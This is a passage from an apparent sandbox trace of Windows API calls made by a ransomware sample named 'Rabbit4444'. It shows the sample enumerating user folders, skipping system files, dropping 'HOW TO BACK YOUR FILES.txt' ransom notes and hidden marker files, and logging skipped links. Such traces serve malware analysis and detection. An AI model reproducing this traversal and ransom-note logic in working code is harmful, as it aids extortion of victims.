ftLastWriteTime.dwLowDateTime=0xef84fc3f, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x3e7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Mozilla Firefox.lnk", cAlternateFileName="MOZILL~1.LNK")) returned 1 [0048.132] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0048.132] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.132] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2="Rabbit4444.exe") returned -1 [0048.132] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2=".") returned 1 [0048.132] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2="..") returned 1 [0048.132] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2="windows") returned -1 [0048.132] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2="bootmgr") returned 1 [0048.132] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2="pagefile.sys") returned -1 [0048.132] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2="boot") returned 1 [0048.132] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2="ids.txt") returned 1 [0048.132] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2="NTUSER.DAT") returned -1 [0048.132] lstrcpyW (in: lpString1=0x130eb68, lpString2="Mozilla Firefox.lnk" | out: lpString1="Mozilla Firefox.lnk") returned="Mozilla Firefox.lnk" [0048.132] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Desktop\\Mozilla Firefox.lnk", dwFileAttributes=0x0) returned 1 [0048.132] lstrlenW (lpString="Mozilla Firefox.lnk") returned 19 [0048.132] lstrlenW (lpString="Rabbit4444") returned 10 [0048.132] lstrcmpiW (lpString1="irefox.lnk", lpString2="Rabbit4444") returned -1 [0048.132] lstrlenW (lpString=".dll") returned 4 [0048.132] lstrcmpiW (lpString1=".lnk", lpString2=".dll") returned 1 [0048.132] lstrlenW (lpString=".lnk") returned 4 [0048.132] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0048.132] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef84fc3f, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xef84fc3f, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xef84fc3f, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x3e7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Mozilla Firefox.lnk", cAlternateFileName="MOZILL~1.LNK")) returned 0 [0048.132] FindClose (in: hFindFile=0x102890 | out: hFindFile=0x102890) returned 1 [0048.133] lstrcpyW (in: lpString1=0x130eb68, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0048.133] CreateFileW (lpFileName="C:\\Users\\Public\\Desktop\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\public\\desktop\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0048.134] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0048.134] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0048.134] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0048.134] CloseHandle (hObject=0x278) returned 1 [0048.134] CloseHandle (hObject=0x27c) returned 1 [0048.135] GetCurrentThreadId () returned 0xd98 [0048.135] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6350 [0048.135] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\Public\\AccountPictures", iMaxLength=2048 | out: lpString1="C:\\Users\\Public\\AccountPictures") returned="C:\\Users\\Public\\AccountPictures" [0048.135] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x114c10 | out: hHeap=0xe0000) returned 1 [0048.135] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6348 | out: hHeap=0xe0000) returned 1 [0048.135] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Public\\AccountPictures" | out: lpString1="C:\\Users\\Public\\AccountPictures") returned="C:\\Users\\Public\\AccountPictures" [0048.135] lstrcatW (in: lpString1="C:\\Users\\Public\\AccountPictures", lpString2="\\" | out: lpString1="C:\\Users\\Public\\AccountPictures\\") returned="C:\\Users\\Public\\AccountPictures\\" [0048.135] lstrcatW (in: lpString1="C:\\Users\\Public\\AccountPictures\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\Public\\AccountPictures\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\Public\\AccountPictures\\.BFC0E91B00AE8A0620D3" [0048.135] CreateFileW (lpFileName="C:\\Users\\Public\\AccountPictures\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\public\\accountpictures\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0048.136] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0048.139] FlushFileBuffers (hFile=0x27c) returned 1 [0048.140] SetFileAttributesW (lpFileName="C:\\Users\\Public\\AccountPictures\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0048.140] CloseHandle (hObject=0x27c) returned 1 [0048.141] lstrlenW (lpString="C:\\Users\\Public\\AccountPictures") returned 31 [0048.141] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0048.141] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\AccountPictures\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x3079b77, ftCreationTime.dwHighDateTime=0x1d1a050, ftLastAccessTime.dwLowDateTime=0xce317778, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xe602ebe3, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102590 [0048.141] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.141] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0048.141] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0048.141] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0048.141] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x3079b77, ftCreationTime.dwHighDateTime=0x1d1a050, ftLastAccessTime.dwLowDateTime=0xce317778, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xe602ebe3, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0048.141] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.141] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0048.141] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0048.141] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0048.141] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0048.141] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe602ebe3, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe602ebe3, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe6054d96, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0048.141] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.141] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0048.141] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0xce317778, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xce317778, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xce317778, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0xc4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0048.142] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.142] lstrcmpiW (lpString1="desktop.ini", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.142] lstrcmpiW (lpString1="desktop.ini", lpString2="Rabbit4444.exe") returned -1 [0048.142] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0048.142] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0048.142] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0048.142] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0048.142] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0048.142] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0048.142] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0048.142] lstrcmpiW (lpString1="desktop.ini", lpString2="NTUSER.DAT") returned -1 [0048.142] lstrcpyW (in: lpString1=0x130eb78, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0048.142] SetFileAttributesW (lpFileName="C:\\Users\\Public\\AccountPictures\\desktop.ini", dwFileAttributes=0x2) returned 1 [0048.143] lstrlenW (lpString="desktop.ini") returned 11 [0048.143] lstrlenW (lpString="Rabbit4444") returned 10 [0048.143] lstrcmpiW (lpString1="esktop.ini", lpString2="Rabbit4444") returned -1 [0048.143] lstrlenW (lpString=".dll") returned 4 [0048.143] lstrcmpiW (lpString1=".ini", lpString2=".dll") returned 1 [0048.143] lstrlenW (lpString=".lnk") returned 4 [0048.143] lstrcmpiW (lpString1=".ini", lpString2=".lnk") returned -1 [0048.143] lstrlenW (lpString=".ini") returned 4 [0048.143] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0048.143] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0xce317778, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xce317778, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xce317778, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0xc4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0048.143] FindClose (in: hFindFile=0x102590 | out: hFindFile=0x102590) returned 1 [0048.143] lstrcpyW (in: lpString1=0x130eb78, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0048.143] CreateFileW (lpFileName="C:\\Users\\Public\\AccountPictures\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\public\\accountpictures\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0048.145] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0048.145] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0048.145] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0048.145] CloseHandle (hObject=0x278) returned 1 [0048.145] CloseHandle (hObject=0x27c) returned 1 [0048.146] GetCurrentThreadId () returned 0xd98 [0048.146] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6670 [0048.146] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy") returned="C:\\Users\\FD1HVy" [0048.146] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xff6f8 | out: hHeap=0xe0000) returned 1 [0048.146] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6668 | out: hHeap=0xe0000) returned 1 [0048.146] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy" | out: lpString1="C:\\Users\\FD1HVy") returned="C:\\Users\\FD1HVy" [0048.146] lstrcatW (in: lpString1="C:\\Users\\FD1HVy", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\") returned="C:\\Users\\FD1HVy\\" [0048.146] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\.BFC0E91B00AE8A0620D3" [0048.146] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0048.147] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0048.149] FlushFileBuffers (hFile=0x27c) returned 1 [0048.150] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0048.151] CloseHandle (hObject=0x27c) returned 1 [0048.151] lstrlenW (lpString="C:\\Users\\FD1HVy") returned 15 [0048.151] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0048.151] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xe6054d96, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102850 [0048.151] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.151] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0048.151] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0048.151] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0048.151] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xe6054d96, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0048.152] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.152] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0048.152] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0048.152] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0048.152] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0048.152] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe6054d96, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe6054d96, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe6054d96, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0048.152] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.152] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0048.152] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x210870f2, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x3b5a0677, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x3b5a0677, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0048.152] lstrcmpiW (lpString1="AppData", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.152] lstrcmpiW (lpString1="AppData", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.152] lstrcmpiW (lpString1="AppData", lpString2="Rabbit4444.exe") returned -1 [0048.152] lstrcmpiW (lpString1="AppData", lpString2=".") returned 1 [0048.152] lstrcmpiW (lpString1="AppData", lpString2="..") returned 1 [0048.152] lstrcmpiW (lpString1="AppData", lpString2="windows") returned -1 [0048.152] lstrcmpiW (lpString1="AppData", lpString2="bootmgr") returned -1 [0048.152] lstrcmpiW (lpString1="AppData", lpString2="pagefile.sys") returned -1 [0048.152] lstrcmpiW (lpString1="AppData", lpString2="boot") returned -1 [0048.152] lstrcmpiW (lpString1="AppData", lpString2="ids.txt") returned -1 [0048.152] lstrcmpiW (lpString1="AppData", lpString2="NTUSER.DAT") returned -1 [0048.152] lstrcpyW (in: lpString1=0x130eb58, lpString2="AppData" | out: lpString1="AppData") returned="AppData" [0048.152] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6548 [0048.152] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x30) returned 0xf7878 [0048.152] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6550 | out: ListHead=0xf68b0, ListEntry=0xf6550) returned 0xf6610 [0048.152] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0048.152] lstrcmpiW (lpString1="Application Data", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.152] lstrcmpiW (lpString1="Application Data", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.152] lstrcmpiW (lpString1="Application Data", lpString2="Rabbit4444.exe") returned -1 [0048.152] lstrcmpiW (lpString1="Application Data", lpString2=".") returned 1 [0048.152] lstrcmpiW (lpString1="Application Data", lpString2="..") returned 1 [0048.152] lstrcmpiW (lpString1="Application Data", lpString2="windows") returned -1 [0048.152] lstrcmpiW (lpString1="Application Data", lpString2="bootmgr") returned -1 [0048.152] lstrcmpiW (lpString1="Application Data", lpString2="pagefile.sys") returned -1 [0048.153] lstrcmpiW (lpString1="Application Data", lpString2="boot") returned -1 [0048.153] lstrcmpiW (lpString1="Application Data", lpString2="ids.txt") returned -1 [0048.153] lstrcmpiW (lpString1="Application Data", lpString2="NTUSER.DAT") returned -1 [0048.153] lstrcpyW (in: lpString1=0x130eb58, lpString2="Application Data" | out: lpString1="Application Data") returned="Application Data" [0048.153] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Application Data", dwFileAttributes=0x2412) returned 1 [0048.153] wsprintfA (in: param_1=0x130e338, param_2="[IGNORE SIMLINK] %S\r\n" | out: param_1="[IGNORE SIMLINK] C:\\Users\\FD1HVy\\Application Data\r\n") returned 51 [0048.153] lstrlenA (lpString="[IGNORE SIMLINK] C:\\Users\\FD1HVy\\Application Data\r\n") returned 51 [0048.153] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ids.txt" (normalized: "c:\\users\\fd1hvy\\desktop\\ids.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0048.153] SetFilePointer (in: hFile=0x278, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x573 [0048.153] WriteFile (in: hFile=0x278, lpBuffer=0x130e338*, nNumberOfBytesToWrite=0x33, lpNumberOfBytesWritten=0x130daf4, lpOverlapped=0x0 | out: lpBuffer=0x130e338*, lpNumberOfBytesWritten=0x130daf4*=0x33, lpOverlapped=0x0) returned 1 [0048.155] CloseHandle (hObject=0x278) returned 1 [0048.156] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x440792d0, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd43ecce6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xce2cb2cd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Contacts", cAlternateFileName="")) returned 1 [0048.156] lstrcmpiW (lpString1="Contacts", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.156] lstrcmpiW (lpString1="Contacts", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.157] lstrcmpiW (lpString1="Contacts", lpString2="Rabbit4444.exe") returned -1 [0048.157] lstrcmpiW (lpString1="Contacts", lpString2=".") returned 1 [0048.157] lstrcmpiW (lpString1="Contacts", lpString2="..") returned 1 [0048.157] lstrcmpiW (lpString1="Contacts", lpString2="windows") returned -1 [0048.157] lstrcmpiW (lpString1="Contacts", lpString2="bootmgr") returned 1 [0048.157] lstrcmpiW (lpString1="Contacts", lpString2="pagefile.sys") returned -1 [0048.157] lstrcmpiW (lpString1="Contacts", lpString2="boot") returned 1 [0048.157] lstrcmpiW (lpString1="Contacts", lpString2="ids.txt") returned -1 [0048.157] lstrcmpiW (lpString1="Contacts", lpString2="NTUSER.DAT") returned -1 [0048.157] lstrcpyW (in: lpString1=0x130eb58, lpString2="Contacts" | out: lpString1="Contacts") returned="Contacts" [0048.157] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Contacts", dwFileAttributes=0x10) returned 1 [0048.157] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf63e8 [0048.157] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x32) returned 0x102750 [0048.157] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf63f0 | out: ListHead=0xf68b0, ListEntry=0xf63f0) returned 0xf6550 [0048.157] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1 [0048.157] lstrcmpiW (lpString1="Cookies", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.157] lstrcmpiW (lpString1="Cookies", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.157] lstrcmpiW (lpString1="Cookies", lpString2="Rabbit4444.exe") returned -1 [0048.157] lstrcmpiW (lpString1="Cookies", lpString2=".") returned 1 [0048.157] lstrcmpiW (lpString1="Cookies", lpString2="..") returned 1 [0048.157] lstrcmpiW (lpString1="Cookies", lpString2="windows") returned -1 [0048.157] lstrcmpiW (lpString1="Cookies", lpString2="bootmgr") returned 1 [0048.157] lstrcmpiW (lpString1="Cookies", lpString2="pagefile.sys") returned -1 [0048.157] lstrcmpiW (lpString1="Cookies", lpString2="boot") returned 1 [0048.157] lstrcmpiW (lpString1="Cookies", lpString2="ids.txt") returned -1 [0048.157] lstrcmpiW (lpString1="Cookies", lpString2="NTUSER.DAT") returned -1 [0048.157] lstrcpyW (in: lpString1=0x130eb58, lpString2="Cookies" | out: lpString1="Cookies") returned="Cookies" [0048.157] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Cookies", dwFileAttributes=0x2412) returned 1 [0048.158] wsprintfA (in: param_1=0x130e338, param_2="[IGNORE SIMLINK] %S\r\n" | out: param_1="[IGNORE SIMLINK] C:\\Users\\FD1HVy\\Cookies\r\n") returned 42 [0048.158] lstrlenA (lpString="[IGNORE SIMLINK] C:\\Users\\FD1HVy\\Cookies\r\n") returned 42 [0048.158] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ids.txt" (normalized: "c:\\users\\fd1hvy\\desktop\\ids.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0048.158] SetFilePointer (in: hFile=0x278, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x5a6 [0048.158] WriteFile (in: hFile=0x278, lpBuffer=0x130e338*, nNumberOfBytesToWrite=0x2a, lpNumberOfBytesWritten=0x130daf4, lpOverlapped=0x0 | out: lpBuffer=0x130e338*, lpNumberOfBytesWritten=0x130daf4*=0x2a, lpOverlapped=0x0) returned 1 [0048.159] CloseHandle (hObject=0x278) returned 1 [0048.160] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe2cfbde8, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe2cfbde8, 